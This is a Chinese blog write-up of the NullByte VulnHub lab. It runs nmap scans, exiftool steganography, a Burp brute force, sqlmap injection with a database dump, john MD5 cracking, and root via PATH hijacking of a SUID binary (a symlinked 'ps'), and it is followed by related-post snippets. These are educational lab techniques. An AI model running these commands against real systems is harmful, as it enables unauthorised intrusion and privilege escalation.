【学渗透靶机——NullByte(suid 提权)】

已于 2023-06-18 15:07:19 修改
阅读量357 收藏
点赞数 1
分类专栏: 靶机学习 文章标签: 网络 安全 运维
于 2023-06-18 09:41:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jieli0901227/article/details/131265852
版权

NullByte

信息收集

主机信息收集

主机ip地址

nmap -sn  192.168.241.0/24

在这里插入图片描述

主机开放端口信息

nmap --min-rate 10000 -p- 192.168.241.161

在这里插入图片描述

主机开放端口详细信息

nmap -sT -sV -p80,111,777,53062 192.168.241.161

在这里插入图片描述

nmap 脚本探测主机漏洞信息

nmap --script=vuln  -p80,111,777,53062 192.168.241.161

在这里插入图片描述
主机开放了80(http),111,777(ssh),53062(未知) , SSH 目前没有收集到账号及密码信息,爆破ssh 暂时放弃,那重点放在80 端口上,

web信息收集

80端口

80 是http服务,先打开看看
在这里插入图片描述
查看源代码也没有用信息
在这里插入图片描述

下载图片文件分析

(1) 查看文件类型

file main.gif

在这里插入图片描述
(2)查看图片信息是否有捆绑

binwalk main.gif

在这里插入图片描述
(3)查看图片是否隐写信息

exiftool main.gif

在这里插入图片描述
发现有字符串:kzMb5nVYJw 这个有可能是SSH ROOT密码,也有可能是路径,
尝试登录失败
接下来尝试路径
在这里插入图片描述
果然是路径,, 但是这个需要输入key ,我们目前没有密码
查看源代码
在这里插入图片描述

暴力破解表单

说这个表单不能连接数据库,并且密码不复杂
那我们爆破尝试一下,打开burp 抓包进行爆破,使用rockyou.txt 这个密码字典,爆破出来密码为elite
在这里插入图片描述
输入密码后,输入admin
在这里插入图片描述
在这里插入图片描述

sql注入

从上面的url 判断可能存在sql注入,sqlmap 尝试一下

sqlmap -u "http://192.168.241.161/kzMb5nVYJw/420search.php?usrtosearch=admin"  --dump --batch

在这里插入图片描述

john 破解MD5 hash

表中的字符串可能是base64 尝试解密

echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |base64 -d

在这里插入图片描述

c6d6bd7ebf806f43c76acc3681703b81

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

在这里插入图片描述

提权

获取系统初始立足点

密码破解出拉omega。使用密码对应账号ramses尝试SSH登录。登录成功 nmap 端口扫描时SSH的端口是777

在这里插入图片描述

查看当前用户以root权限能够执行命令

在这里插入图片描述
发现没有

查看计划任务

**在这里插入图片描述**

当前用户组可以操作哪些权限


查看文件.bash_history看看能不能发现当前账号执行过什么命令
在这里插入图片描述
这个是什么东西呢,,既然不认识,那就执行这个命令看看

在这里插入图片描述
procwatch 执行时调用了sh 和ps
知道上面的结果那么我们可以劫持ps命令提权了

提权操作

cd /var/www/backup
ln -s /bin/sh ps
export PATH=.:$PATH
./procwatch

在这里插入图片描述

也可以生成一个ps文件,然后里面写/bin/sh就可以,给这个文件所有权限然后执行二进制即可提权

靶机渗透NullByte: 1
weixin_64267091的博客
01-29 1155
对于vulnhub中的靶机,我们都需先下载镜像,然后导入VM,并将改为NAT模式。首先我们再来看一下靶机渗透的步骤:信息收集-漏洞分析--。基本都是这个三个步骤,接下来开始我们今天的靶机渗透吧!
Linux渗透实战之Nullbyte靶场
2401_83799022的博客
01-09 912
以靶场的形式给师傅们展示,这样大家看到我的一些好的操作也就可以去操作,去复现,这个也是后面我写一些渗透测试文章相关的一个走向,因为之前写了很大实战中的案例分享,但是是真实的站点,也不好给大家实操,只能作为思路分享,但是我现在单独拿出一些好的靶场来给师傅们演示渗透测试,那么这样对于师傅们来讲是一个不错的体验!我们这个靶机的那个存在sql注入界面的地方,我们第二种方法是以写入php木马执行文件,然后进行执行命令,那么我们可以执行命令,我们不就可以直接写入反弹shell的木马,然后直接迁移shell了。
NullByte靶机练习
IWANnaaa的博客
04-07 317
NullByte靶机练习。
vulnhub靶场:NULLBYTE
weixin_46497491的博客
03-25 686
vulnhub、NULLBYTE、nmap、SQL注入写shell、suid
python null byte_Python CSV错误:行包含NULL字节
weixin_39530647的博客
12-07 862
我正在使用以下代码处理一些CSV文件:reader = csv.reader(open(filepath,"rU"))try:for row in reader:print 'Row read successfully!', rowexcept csv.Error, e:sys.exit('file %s, line %d: %s' % (filename, reader.line_num, e)...
01_渗透靶场NullByte:namp使用,多姿势SQL注入,
Hack word
03-23 2089
首先使用nmap进行扫描,发现NullByte靶机地址为192.168.20.14,然后对齐各种端口进行检测,使用默认脚本检测,然后进行目录爆破,根据爆破的结果去访问web页,查看网页源码查看网页上图片的信息,将这个信息进行解析查看文件的具体内容,发现字符串尝试当作密码/路径等一切可以想到的进行访问,跳转到新的界面测试是否存在SQL注入,但是在新的页面当中所存在的是"双引号报错,根据SQL注入的多种姿势进行操作,最终拿到phpmyadmin页面的登录账户和密码,然后进行远程ssh连接,进入后首先查看当前用户
CFS三层靶机——内网渗透流程
2301_81177363的博客
05-05 950
靶场由三台服务器构成分别为Target1、Target2、Target3,其系统分别是centos、Ubuntu、Windows7。Target1搭载VMnet2和NAT网卡、Target2搭载VMnet2和VMnet3网卡、Target3仅搭载VMnet3网卡。(确保两两之间能互相通信)
DC-2靶机(ssh远程SUID(VIM)
JyajT的博客
04-23 349
dc系列
20210411web渗透习之Linux SUID
qq_45290991的博客
04-13 319
Linux下有很多方式,,我记得之前我写了一篇内核:web渗透习之Linux内核 内核最好用也是最通杀的“倚天剑”。。但是实战中很难使用……因为对方不是傻子都会打补丁……所以需要的是suid。。测试环境为ubutu15.5 SUID是Linux的一种限机制,具有这种限的文件会在其执行时,使调用者暂时获得该文件拥有者的限。如果拥有SUID限,那么就可以利用系统中的二进制文件和工具来进行root。 就相当于说:我在使用这个文件的时候,我有了root限,,所以一般的思路就
内存流和null字节
weixin_30547797的博客
05-06 285
1 #include <stdio.h> 2 #include <string.h> 3 int main() 4 { 5 char buf[128]={0}; 6 FILE* fp = fmemopen(buf,128,"w+"); 7 fprintf(fp,"hello world!"); 8 print...
红队打靶:Nullbyte打靶思路详解(vulnhub)
Bossfrank的博客
07-25 2310
本文是vulnhub靶机NullByte的详细打靶过程。涉及到的知识点包括图片隐写、hydra密码爆破、SQL注入(联合查询)、SQL注入写shell、suid等。本靶机很精巧,很值得打靶习。SQL注入思路(本文介绍了殊途同归的四种方式)与的思想值得进行总结与反思。
csv文件中关于null byte的处理
nba的惆怅的专栏
10-26 3048
csv 文件中 null byte在生成csv2标准的csv文件时,默认的分割符是英文中的“ , ”或者指定的其它单个(无法多个)分隔符,那么当csv文件中的某个字段包含分隔符时,该字段的两边都会用一个null byte加以区别改字段。 在上述情况下csv文件处理会报 contains null byte errror,解决方式是,自己写一个分割处理函数,单独读出每一行的每一个字段。 利用cod
shellcode 中 null byte 的成因和避免方式总结
0pr
11-16 629
第一种避免 null byte 的方式其实很简单,开发过程中注意就行,有小数都换成大数加负数或者负数取负即可。第二种避免 null byte 的方式得结合实际情况,看当时哪个寄存器可用。可以看到除了特定的会产生 null byte 外,使用其他寄存器都是安全的。call 和 jmp 指令产生的 Null Byte,得从头开始讲了。不随便挖坑,还有坑没填完 😄。
NullByte靶机
ybkj6666的博客
11-09 294
这边可以看到开放4个端口。
攻防靶场(35)suid、systemd、lxd [InfosecPrepOSCP]
OneMoreThink
01-10 276
目录1. 侦查 1.1 收集目标网络信息:IP地址 1.2 主动扫描:扫描IP地址段 1.3 主动扫描:字典扫描2. 初始访问 2.1 有效账户:本地账户3. 升 3.1 滥用特控制机制:Setuid和Setgid 3.1 创建或修改系统进程:Systemd服务 3.1 利用漏洞:LXD程序靶场下载地址:https://www.vulnhub....
同一无线网络下的设备IP地址是否相同?
最新发布
hgdlip的博客
05-23 511
在家庭和办公网络普及的今天,许多人都会好奇:连接同一个Wi-Fi的设备是否共享相同的IP地址?这个问题看似简单,实则涉及多个角度。本文将为您揭示其中的技术奥秘。
第 4 章:网络与总线——CAN / Ethernet / USB-OTG
hemoparrot的专栏
05-20 885
本章深入探讨了三种关键通信总线(CAN、Ethernet、USB-OTG)的协议架构、硬件接口与软件驱动,重点介绍了在STM32微控制器中的寄存器配置、中断与DMA驱动框架。通过实战案例,展示了如何实现基于CAN总线的节点通信、基于Ethernet的TCP/IP通信,以及基于USB-OTG的虚拟串口与大容量存储访问。CAN总线适用于高可靠、实时要求的场景,Ethernet适合高带宽、远距离的网络互联,而USB-OTG则供了即插即用的多功能接口。本章还供了选型建议,帮助读者根据实际需求选择合适的通信总线,
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.youkuaiyun.com/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.youkuaiyun.com/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.youkuaiyun.com/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值